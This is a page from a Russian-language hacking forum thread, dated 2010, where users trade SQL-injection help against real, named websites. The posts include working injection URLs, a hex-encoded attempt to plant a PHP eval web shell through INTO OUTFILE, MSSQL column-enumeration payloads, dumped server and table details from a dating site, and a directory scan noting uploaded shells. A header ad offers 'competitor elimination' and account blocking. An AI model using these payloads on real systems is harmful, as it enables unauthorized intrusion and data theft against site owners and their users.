УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1414 из 2438

1414

Опции темы

Поиск в этой теме

Опции просмотра

#14131

29.06.2010, 22:09

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от wkar

wkar said:

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1

запрос:

PHP код:


		
			
PHP:
[COLOR="#000000"]http://www.buddhatour.ru/new/?link=1+union+select+'[COLOR="#0000BB"][/COLOR]'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'[/COLOR]

Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/

1. Подобрать кол-во полей, а не пытаться сразу лить шелл

Код:

Code:
http://www.buddhatour.ru/new/?link=1+union+select+1,version(),3,4+limit+1,1--+

или так:

http://www.buddhatour.ru/new/?link=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+

2. file_priv=N, ни о какой заливке шелла через скулю здесь речи идти не может.

#14132

29.06.2010, 22:12

BlackFan

Новичок

Регистрация: 03.01.2009

Сообщений: 27

Провел на форуме:
367442

Репутация: 41

Цитата:

Сообщение от wkar

wkar said:

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1

запрос:

PHP код:


		
			
PHP:
[COLOR="#000000"]http://www.buddhatour.ru/new/?link=1+union+select+'[COLOR="#0000BB"][/COLOR]'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'[/COLOR]

Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/

В union select во-первых 4 столбца, во-вторых magic_quotes = On

Но это можно обойти, так как второй параметр учавствует в другом запросе...

Код:

Code:
http://www.buddhatour.ru/new/?link=-1+union+select+1,0x3120616E64202873656C65637420273C3F706870206576616C28245F4745545B765D293B3F3E2720696E746F206F757466696C6520272F686F6D652F627564646861746F75722F646174612F7777772F627564646861746F75722E72752F65652E7068702729,3,4

Второй столбец это "1 and (select '' into outfile '/home/buddhatour/data/www/buddhatour.ru/ee.php')"

Но тут мы опять же ничего не получаем

Код:

Code:
Access denied for user 'buddhatour_budd'@'localhost' (using password: YES)

Вроде бы так...

Пока писал, меня 2 раза опередили)

#14133

29.06.2010, 23:22

durito

Познающий

Регистрация: 06.06.2008

Сообщений: 76

Провел на форуме:
117639

Репутация: 55

Отправить сообщение для durito с помощью ICQ

вопрос чисто теоретический:

при раскрутке стандартной mssql инъекции пару раз сталкивался что при запросе:

1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+C OLUMN_NAME+NOT+IN+('column'))--

скуль плевать хотела на имя таблицы и выдавала колонки из всех таблиц в алфавитном порядке. именно поэтому, на мой взгляд, возникали проблемы с автоматическими инжекторами, которые не могли вывести колонки.

собственно вопрос, почему выводятся все колонки из всех таблиц, а не из заданой?

#14134

29.06.2010, 23:32

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Пример в студию ускорил бы решение вашей проблемы, да, бывают специфичные ситуации

PS: Вообще not in и перечислять там имена колонок тупо - тухлец способ по определению

Вот если брать одну из mssql-инъекций в "Ваши sql-инъекции":

/showpost.php?p=2168515&postcount=12236

Код:

Code:
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=@@version--

то для выяснения колонок из таблицы User ми бы рекомендовал бы такую конструкцию (как показала практика - самая универсальная для различных ситуаций):

Код:

Code:
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+and+column_name+not+in+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+order+by+column_name)+order+by+column_name)a)--

получим City

Код:

Code:
http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+and+column_name+not+in+(select+top+2+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+order+by+column_name)+order+by+column_name)a)--

получим Class

.....

во втором случае меняется

.....not+in+(select+top+2....

#14135

29.06.2010, 23:50

durito

Познающий

Регистрация: 06.06.2008

Сообщений: 76

Провел на форуме:
117639

Репутация: 55

Цитата:

Сообщение от Pashkela

Pashkela said:
Пример в студию ускорил бы решение вашей проблемы, да, бывают специфичные ситуации
PS: Вообще not in - тухлец способ по определению

примерчик:

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=%28SELECT+TOP+ 1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHER E+TABLE_NAME=%27Utenti%27+AND+COLUMN_NAME+NOT+IN+% 28%27binary_message_body%27,%27cap%27,%27Cat%27,%2 7Categoria%27,%27cell%27,%27cod%27,%27conversation _group_id%27,%27conversation_handle%27,%27data%27, %27fax%27,%27figli%27,%27fragment_bitmap%27,%27fra gment_size%27,%27fuma%27,%27h%27,%27hob%27,%27id%2 7,%27Idc%27,%27ind%27,%27lingue%27,%27mail%27,%27m essage_id%27,%27message_sequence_number%27,%27mess age_type_id%27,%27nazione%27,%27newsCorpo%27,%27ne wsDataInserim%27,%27newsFoto%27,%27newsId%27,%27ne wsSospesa%27,%27newsTitolo%27,%27next_fragment%27, %27nome%27,%27occ%27,%27p%27,%27paese%27,%27patn%2 7,%27person%27,%27priority%27,%27prof%27,%27prov%2 7,%27queuing_order%27,%27regi%27,%27resp%27,%27ser vice_contract_id%27,%27service_id%27,%27skype%27,% 27stato%27,%27status%27,%27tel%27,%27titolo%27,%27 url1%27,%27url2%27,%27url3%27,%27url4%27,%27urlpic %27,%27userId%27,%27userLevel%27,%27userName%27,%2 7userPwd%27%29%29--

а что есть не из тухлых способов?

#14136

30.06.2010, 00:00

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Сообщение от durito

durito said:
примерчик:
а что есть не из тухлых способов?

вот конкретно относительно вашего примерчика и таблицы News:

Код:

Code:
HOST: www.feliceincontro.net
-----------------------------------------
System information:
-----------------------------------------
@@version: Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) 
	May 26 2009 14:24:20 
	Copyright (c) 1988-2005 Microsoft Corporation
	Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

system_user: MSSql18332
db_name(): MSSql18332
=============================================
Tables in information_schema:
=============================================
  annunci
  foto
  Categoria
  News
  Utenti
  sedi
-----------------------------------------
Columns from table [ News ]
-----------------------------------------
  newsCorpo - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+0+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsDataInserim - - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsFoto - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+2+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsTitolo - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+5+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsSospesa - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+4+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsId -  колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+3+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

#14137

30.06.2010, 09:53

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

Провел на форуме:
58603

Репутация: 3

Цитата:

Сообщение от wkar

wkar said:
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/

Сп... но написано, что "Этот файл всё ещё заливается!". Залей еще куданить, pls

#14138

30.06.2010, 11:34

k2b1~

Новичок

Регистрация: 17.06.2010

Сообщений: 0

Провел на форуме:
5094

Репутация: 0

Цитата:

Сообщение от None

http://oragir.am/news.php?id=13%27a

здесь sql inj ?

Цитата:

Сообщение от None

http://oragir.am/news.php?id=13+union+select+0

ето филтрация ?

и как обходит ?

#14139

30.06.2010, 12:54

v1d0qz

Познающий

Регистрация: 21.07.2007

Сообщений: 68

Провел на форуме:
947074

Репутация: 257

Цитата:

Сообщение от k2b1~

k2b1~ said:
здесь sql inj ?
и как обходит ?

Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.

Цитата:

Сообщение от k2b1~

k2b1~ said:
ето филтрация ?

Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.

#14140

30.06.2010, 14:02

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от v1d0qz

v1d0qz said:
Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.
Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.

Все правильно написано только смущает одно, что там два залитых шелла!

» http://oragir.am/.htaccess HTTP 403 Forbidden

» http://oragir.am/.htconfig HTTP 403 Forbidden

» http://oragir.am/.htpasswd HTTP 403 Forbidden

» http://oragir.am/cgi-bin/ HTTP 403 Forbidden

» http://oragir.am/cgi-sys/ HTTP 403 Forbidden

» http://oragir.am/images/ HTTP 403 Forbidden

» http://oragir.am/js/ HTTP 403 Forbidden

» http://oragir.am/new/ HTTP 200 OK

» http://oragir.am/_private/ HTTP 401 Authorization Required

» http://oragir.am/includes/ HTTP 200 OK

» http://oragir.am/server-status/ HTTP 403 Forbidden

» http://oragir.am/error_log HTTP 403 Forbidden

» http://oragir.am/administrator/ HTTP 200 OK

» http://oragir.am/also order_log.dat HTTP 403 Forbidden

» http://oragir.am/cpanel/ HTTP 301 Moved Permanently

» http://oragir.am/icons/ HTTP 200 OK

» http://oragir.am/index.php HTTP 200 OK

» http://oragir.am/lang/ HTTP 403 Forbidden

» http://oragir.am/manual/ HTTP 200 OK

» http://oragir.am/news/ HTTP 403 Forbidden

» http://oragir.am/phpmyadmin/ HTTP 401 Authorization Required

» http://oragir.am/phpshell.php HTTP 403 Forbidden

» http://oragir.am/shell.php HTTP 403 Forbidden

» http://oragir.am/webadmin.nsf HTTP 403 Forbidden

» http://oragir.am/webmail/ HTTP 301 Moved Permanently

• Possible engine => FrontPage:

» http://oragir.am/_vti_bin/ HTTP 403 Forbidden

» http://oragir.am/_vti_bin/_vti_adm/ HTTP 403 Forbidden

» http://oragir.am/_vti_bin/_vti_aut/ HTTP 403 Forbidden

» http://oragir.am/_vti_cnf/ HTTP 403 Forbidden

» http://oragir.am/_vti_log/ HTTP 403 Forbidden

» http://oragir.am/_vti_pvt/ HTTP 403 Forbidden

» http://oragir.am/_vti_txt/ HTTP 403 Forbidden

Страница 1414 из 2438

1414

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход